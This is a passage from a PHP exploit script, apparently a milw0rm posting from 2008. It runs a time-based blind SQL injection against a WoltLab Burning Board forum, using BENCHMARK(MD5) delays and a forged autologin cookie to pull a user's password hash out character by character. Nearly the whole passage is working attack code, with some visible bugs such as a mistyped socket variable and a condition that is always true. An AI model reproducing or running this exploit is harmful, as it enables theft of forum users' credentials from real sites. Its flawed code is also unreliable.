$char,BENCHMARK(3000000,MD5(23)),1))"; // Edit 3000000 if the stuff doesn't work or taking long times. /** Place here youre autologin cookie **/ $cookie = "wcf_cookieHash=; wcf_boardLastActivityTime=; wcf_userID=; wcf_password=;"; $starttime = time(); $connection = fsockopen($host, 80); fputs($connection, "GET: $attack HTTP/1.1\n"); fputs($connection, "Host: $host\n"); fputs($connection, "Cookie: $cookie\n"); fputs($connection, "Content-type: application/x-www-form-urlencoded\n"); fputs($connection, "Connection: close\n\n"); fputs($connection, "$attack\n"); fputs($$connection, "$cookie\n"); //while(!feof($connection)) { //$res .= fgets($connection, 128); //} fclose($con); $endtime = time(); $dif = $endtime - $starttime; if($dif > 10) // Edit this number, if the script doesn't work { if($char != 65 or $char != 66 or $char != 67 or $char != 68 or $char != 69 or $char != 70) { echo "Not the right char ($char) position $pos. Try another...\n"; start($pos, $char +1); } else { start($pos, $char +1); } } else { echo "K, find one ($char)\n"; if ($char == 48) { $hash .= "0"; } else if($char == 49) { $hash .= "1"; } else if($char == 50) { $hash .= "2"; } else if($char == 51) { $hash .= "3"; } else if($char == 52) { $hash .= "4"; } else if($char == 53) { $hash .= "5"; } else if($char == 54) { $hash .= "6"; } else if($char == 55) { $hash .= "7"; } else if($char == 56) { $hash .= "8"; } else if($char == 57) { $hash .= "9"; }else if($char == 58) { $hash .= "10"; } else if($char == 65) { $hash .= "a"; } else if($char == 66) { $hash .= "b"; } else if($char == 67) { $hash .= "c"; } else if($char == 68) { $hash .= "d"; } else if($char == 69) { $hash .= "e"; } else if($char == 70) { $hash .= "f"; } else if($char == 97) { $hash .= "a"; } else if($char == 98) { $hash .= "b"; } else if($char == 99) { $hash .= "c"; } else if($char == 100) { $hash .= "d"; } else if($char == 101) { $hash .= "e"; } else if($char == 102) { $hash .= "f"; } echo "$hash\n"; if(strlen($hash) == 32) { die($hash); } else { start($pos +1, 48); } } } ?> # milw0rm.com [2008-02-20]